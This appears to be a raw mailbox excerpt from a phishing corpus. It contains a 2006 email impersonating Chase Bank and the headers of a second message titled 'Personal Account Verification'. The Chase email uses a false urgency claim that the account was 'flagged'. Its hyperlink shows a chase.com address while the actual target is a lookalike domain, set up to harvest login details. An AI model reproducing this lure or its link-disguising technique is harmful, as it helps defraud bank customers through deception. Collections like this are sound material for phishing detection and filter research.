From: "Chase Team" <memberservice@chase.com>
Content-type: text/html
Date: Mon, 23 Jan 2006 07:47:48 -0800 (PST)
Status: O
X-Status: 
X-Keywords:                  
X-UID: 267

Dear Chase Member,<p>

Your account has been randomly flagged in our system as a part of our 
routine security measures. This is a must to ensure that only you have 
access and use of your Chase account and to ensure a safe Chase experience. 
We require all flagged accounts to v

erify their information on file with us. To verify your Information at this time, please visit our secure server webform by clicking the hyperlink below: <p>

<a target=_blank 
href="http://www.cashe.com.web-scr-account-cashe.info/reidentify/sso_reidentifyjsp/LOBRBGLogon/sso_co_home.jsp.htm">https://www.chase.com/cgi-bin/webscr?cmd=_login</a><p>

Thank you for using Chase Manhattan Bank!<br>
The Chase Manhattan Bank  Team <p>

--------------------------------------------------------------------------------<p>

Please do not reply to this e-mail. Mail sent to this address cannot be answered. For assistance, log in to your Chase account and choose the "Help" link in the footer of any page.<p>

To receive email notifications in plain text instead of HTML, update your preferences here. <p>



Chase  Email ID PP478

From jesalg@crete.globat.com  Mon Jan 23 11:29:36 2006
Return-Path: <jesalg@crete.globat.com>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail2.example.com (mail2.example.com [10.3.4.5])
	by naughty.example.com (Postfix) with ESMTP id 5C9C2536E15
	for <nobody@login.example.com>; Mon, 23 Jan 2006 11:29:35 -0500 (EST)
Received: from mail0.globat.com (mail0.globat.com [203.22.204.30])
	by mail2.example.com (Postfix) with ESMTP id E41EE6FA38E
	for <nobody@example.com>; Mon, 23 Jan 2006 11:29:32 -0500 (EST)
Received: from crete.globat.com (staten.inside.globat.com [10.1.1.148])
	by mail0.globat.com (8.12.11/8.12.9) with SMTP id k0NGOMJq028247
	for <nobody@example.com>; Mon, 23 Jan 2006 08:24:22 -0800 (PST)
	(envelope-from jesalg@crete.globat.com)
Received: (qmail 68243 invoked by uid 10317); 23 Jan 2006 16:24:21 -0000
Date: 23 Jan 2006 16:24:21 -0000
Message-ID: <20060123162421.68241.qmail@crete.globat.com>
To: nobody@example.com
Subject: Personal Account Verification 
